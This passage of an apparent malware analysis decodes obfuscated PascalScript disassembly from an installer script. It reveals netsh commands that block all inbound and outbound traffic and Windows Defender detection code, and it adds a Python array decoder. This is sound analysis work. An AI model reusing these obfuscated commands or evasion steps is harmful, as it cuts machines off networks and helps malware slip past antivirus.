], S32(108)
assign Var9[35], S32(108)
assign Var9[36], S32(112)
assign Var9[37], S32(111)
assign Var9[38], S32(108)
assign Var9[39], S32(105)
assign Var9[40], S32(99)
assign Var9[41], S32(121)
assign Var9[42], S32(32)
assign Var9[43], S32(98)
assign Var9[44], S32(108)
assign Var9[45], S32(111)
assign Var9[46], S32(99)
assign Var9[47], S32(107)
assign Var9[48], S32(105)
assign Var9[49], S32(110)
assign Var9[50], S32(98)
assign Var9[51], S32(111)
assign Var9[52], S32(117)
assign Var9[53], S32(110)
assign Var9[54], S32(100)
assign Var9[55], S32(44)
assign Var9[56], S32(98)
assign Var9[57], S32(108)
assign Var9[58], S32(111)
assign Var9[59], S32(99)
assign Var9[60], S32(107)
assign Var9[61], S32(111)
assign Var9[62], S32(117)
assign Var9[63], S32(116)
assign Var9[64], S32(98)
assign Var9[65], S32(111)
assign Var9[66], S32(117)
assign Var9[67], S32(110)
assign Var9[68], S32(100)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var7 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype UnicodeString_2 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype S32 ; StackCount = 11
assign Var11, S32(5)
pushvar Var10 ; StackCount = 12
call SETARRAYLENGTH
pop ; StackCount = 11
pop ; StackCount = 10
assign Var10[0], S32(110)
assign Var10[1], S32(101)
assign Var10[2], S32(116)
assign Var10[3], S32(115)
assign Var10[4], S32(104)
assign Var9, Var10
pop ; StackCount = 9
pushvar Var8 ; StackCount = 10
call STRFROMCODE
pop ; StackCount = 9
pop ; StackCount = 8
pushvar Var2 ; StackCount = 9
call EXEC
pop ; StackCount = 8
pop ; StackCount = 7
pop ; StackCount = 6
pop ; StackCount = 5
pop ; StackCount = 4
pop ; StackCount = 3
pop ; StackCount = 2
pop ; StackCount = 1
ret
This function never holds its command lines as string literals: it builds them from ASCII-code arrays (two argument strings plus two copies of the program name), converts each array with STRFROMCODE, and hands the result to EXEC.
Below are the decoded ASCII codes of all four arrays and the strings they correspond to:
First array (36 bytes)
ASCII codes: 97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 115, 116, 97, 116, 101, 32, 111, 110
String: "advfirewall set allprofiles state on"
Second array (5 bytes)
ASCII codes: 110, 101, 116, 115, 104
String: "netsh"
Third array (69 bytes)
ASCII codes: 97, 100, 118, 102, 105, 114, 101, 119, 97, 108, 108, 32, 115, 101, 116, 32, 97, 108, 108, 112, 114, 111, 102, 105, 108, 101, 115, 32, 102, 105, 114, 101, 119, 97, 108, 108, 112, 111, 108, 105, 99, 121, 32, 98, 108, 111, 99, 107, 105, 110, 98, 111, 117, 110, 100, 44, 98, 108, 111, 99, 107, 111, 117, 116, 98, 111, 117, 110, 100
String: "advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound"
Fourth array (5 bytes)
ASCII codes: 110, 101, 116, 115, 104
String: "netsh"
So the function configures the Windows Firewall by running two netsh commands:
Enable every firewall profile: netsh advfirewall set allprofiles state on
Block all inbound and outbound connections: netsh advfirewall set allprofiles firewallpolicy blockinbound,blockoutbound
Effect: it turns the Windows Firewall on and sets the default policy of every profile to block inbound and outbound connections. With the outbound default set to block, anything not explicitly allowed by a rule is dropped, so the host is effectively cut off from the network until the policy is changed back. On an affected machine, netsh advfirewall show allprofiles reports this as "BlockInbound,BlockOutbound" in the Firewall Policy line of each profile.
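Decoding these arrays by hand is error-prone once a script has dozens of them, so here is a small decoder for this listing format. It is an added example for this analysis, not code from the original post or from the script being analysed; it relies only on the instruction shapes visible in the listings (assign VarL, S32(n) followed by pushvar VarA and call SETARRAYLENGTH to size an array, assign VarA[i], S32(c) per character, and assign VarB, VarA once the array is complete), and the function names are the example's own. The sample inputs are the "netsh" fragment of the firewall function, kept in the run-together form the post shows, plus a constructed line-broken excerpt of the three arrays ("root", "\", "cimv2") that the ISDEFENDERRUNNING listing concatenates.

```python
import re

# Added example (not from the original post or the analysed script): decoder
# for the character arrays in IFPS (PascalScript) disassembly listings such as
# the ones quoted in this analysis. Only instruction shapes visible in those
# listings are recognised; helper names are this example's own.
#   assign VarL, S32(n) ; pushvar VarA ; call SETARRAYLENGTH  -> VarA has n elements
#   assign VarA[i], S32(c)                                    -> one character code
#   assign VarB, VarA                                         -> array complete (copied)

RE_ELEM = re.compile(r"^assign (Var\d+)\[(\d+)\], S32\((\d+)\)$")
RE_SCALAR = re.compile(r"^assign (Var\d+), S32\((\d+)\)$")
RE_COPY = re.compile(r"^assign (Var\d+), (Var\d+)$")
RE_PUSHVAR = re.compile(r"^pushvar (Var\d+)$")
OPCODES = r"assign|pushvar|pushtype|call|pop|add|ret|starteh"


def split_instructions(listing):
    """Yield one instruction per item with '; StackCount = n' comments removed.

    Also handles the run-together form seen when a forum post loses its line
    breaks, where the next opcode follows a ')' or a variable name directly."""
    text = re.sub(r"\s*;\s*StackCount = \d+", "\n", listing)
    text = re.sub(r"(?<=[)\w\]])(?=(?:%s)\b)" % OPCODES, "\n", text)
    for raw in text.splitlines():
        if raw.strip():
            yield raw.strip()


def decode_arrays(listing):
    """Return [(array_var, declared_len, text), ...] in listing order.

    declared_len is the S32 handed to SETARRAYLENGTH (None if not seen); a
    mismatch with len(text) usually means the listing was cut off."""
    pending = {}      # array var -> [(index, code), ...] not yet flushed
    declared = {}     # array var -> length handed to SETARRAYLENGTH
    last_scalar = None
    last_pushvar = None
    out = []

    def flush(var):
        elems = pending.pop(var, None)
        if elems is not None:
            elems.sort()
            out.append((var, declared.get(var), "".join(chr(c) for _, c in elems)))

    for ins in split_instructions(listing):
        m = RE_ELEM.match(ins)
        if m:
            pending.setdefault(m.group(1), []).append((int(m.group(2)), int(m.group(3))))
            continue
        m = RE_SCALAR.match(ins)
        if m:
            last_scalar = int(m.group(2))
            continue
        m = RE_PUSHVAR.match(ins)
        if m:
            last_pushvar = m.group(1)
            continue
        if ins == "call SETARRAYLENGTH" and last_pushvar is not None:
            # In every listing the length is the S32 assigned right before pushvar.
            declared[last_pushvar] = last_scalar
            continue
        m = RE_COPY.match(ins)
        if m:
            flush(m.group(2))      # no-op unless the source holds pending codes
    for var in list(pending):      # leftovers: the listing ended mid-array
        flush(var)
    return out


def length_mismatches(entries):
    """Entries whose decoded length differs from their SETARRAYLENGTH value."""
    return [e for e in entries if e[1] is not None and e[1] != len(e[2])]


# Sample inputs: the 'netsh' fragment of the firewall function in the
# run-together form the post shows, and a constructed line-broken excerpt of
# the ISDEFENDERRUNNING arrays for "root", "\" and "cimv2".
SAMPLE_RUN_TOGETHER = (
    "pushtype S32 ; StackCount = 11assign Var11, S32(5)pushvar Var10 ; StackCount = 12"
    "call SETARRAYLENGTHpop ; StackCount = 11pop ; StackCount = 10assign Var10[0], S32(110)"
    "assign Var10[1], S32(101)assign Var10[2], S32(116)assign Var10[3], S32(115)"
    "assign Var10[4], S32(104)assign Var9, Var10pop ; StackCount = 9pushvar Var8 ; StackCount = 10"
    "call STRFROMCODEpop ; StackCount = 9"
)
SAMPLE_LINES = """\
assign Var12, S32(4)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
assign Var11[0], S32(114)
assign Var11[1], S32(111)
assign Var11[2], S32(111)
assign Var11[3], S32(116)
assign Var10, Var11
assign Var12, S32(1)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
assign Var11[0], S32(92)
assign Var10, Var11
assign Var12, S32(5)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
assign Var11[0], S32(99)
assign Var11[1], S32(105)
assign Var11[2], S32(109)
assign Var11[3], S32(118)
assign Var11[4], S32(50)
assign Var10, Var11
add Var8, Var9
"""

if __name__ == "__main__":
    for var, n, text in decode_arrays(SAMPLE_RUN_TOGETHER) + decode_arrays(SAMPLE_LINES):
        print("%-5s len=%s %r" % (var, n, text))
```

The SETARRAYLENGTH value is kept alongside each decoded string so that a truncated listing shows up as a length mismatch instead of silently yielding a shorter command; the add Var8, Var9 concatenations are left to the reader, since which string variable each STRFROMCODE result lands in depends on the calling convention rather than on anything the arrays themselves say.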
Windows Defender is handled by two further functions, "ISDEFENDERRUNNING" and "ADDDEFENDEREXCLUSION". Let's look at them, starting with "ISDEFENDERRUNNING":
.function(export) BOOLEAN ISDEFENDERRUNNING()
pushtype Variant ; StackCount = 1
pushtype Variant ; StackCount = 2
pushtype Variant ; StackCount = 3
pushtype UnicodeString_2 ; StackCount = 4
pushtype UnicodeString_2 ; StackCount = 5
pushtype UnicodeString_2 ; StackCount = 6
pushtype UnicodeString_2 ; StackCount = 7
assign RetVal, BOOLEAN(0)
starteh null, loc_b35, null, loc_b43
pushtype Type30 ; StackCount = 8
pushtype Type30 ; StackCount = 9
pushtype S32 ; StackCount = 10
assign Var10, S32(26)
pushvar Var9 ; StackCount = 11
call SETARRAYLENGTH
pop ; StackCount = 10
pop ; StackCount = 9
assign Var9[0], S32(87)
assign Var9[1], S32(66)
assign Var9[2], S32(69)
assign Var9[3], S32(77)
assign Var9[4], S32(83)
assign Var9[5], S32(99)
assign Var9[6], S32(114)
assign Var9[7], S32(105)
assign Var9[8], S32(112)
assign Var9[9], S32(116)
assign Var9[10], S32(105)
assign Var9[11], S32(110)
assign Var9[12], S32(103)
assign Var9[13], S32(46)
assign Var9[14], S32(83)
assign Var9[15], S32(87)
assign Var9[16], S32(66)
assign Var9[17], S32(69)
assign Var9[18], S32(77)
assign Var9[19], S32(76)
assign Var9[20], S32(111)
assign Var9[21], S32(99)
assign Var9[22], S32(97)
assign Var9[23], S32(116)
assign Var9[24], S32(111)
assign Var9[25], S32(114)
assign Var8, Var9
pop ; StackCount = 8
pushvar Var4 ; StackCount = 9
call STRFROMCODE
pop ; StackCount = 8
pop ; StackCount = 7
pushtype WideString ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(4)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(114)
assign Var11[1], S32(111)
assign Var11[2], S32(111)
assign Var11[3], S32(116)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
assign Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(1)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(92)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackCount = 8
pushtype UnicodeString_2 ; StackCount = 9
pushtype Type30 ; StackCount = 10
pushtype Type30 ; StackCount = 11
pushtype S32 ; StackCount = 12
assign Var12, S32(5)
pushvar Var11 ; StackCount = 13
call SETARRAYLENGTH
pop ; StackCount = 12
pop ; StackCount = 11
assign Var11[0], S32(99)
assign Var11[1], S32(105)
assign Var11[2], S32(109)
assign Var11[3], S32(118)
assign Var11[4], S32(50)
assign Var10, Var11
pop ; StackCount = 10
pushvar Var9 ; StackCount = 11
call STRFROMCODE
pop ; StackCount = 10
pop ; StackCount = 9
add Var8, Var9
pop ; StackC

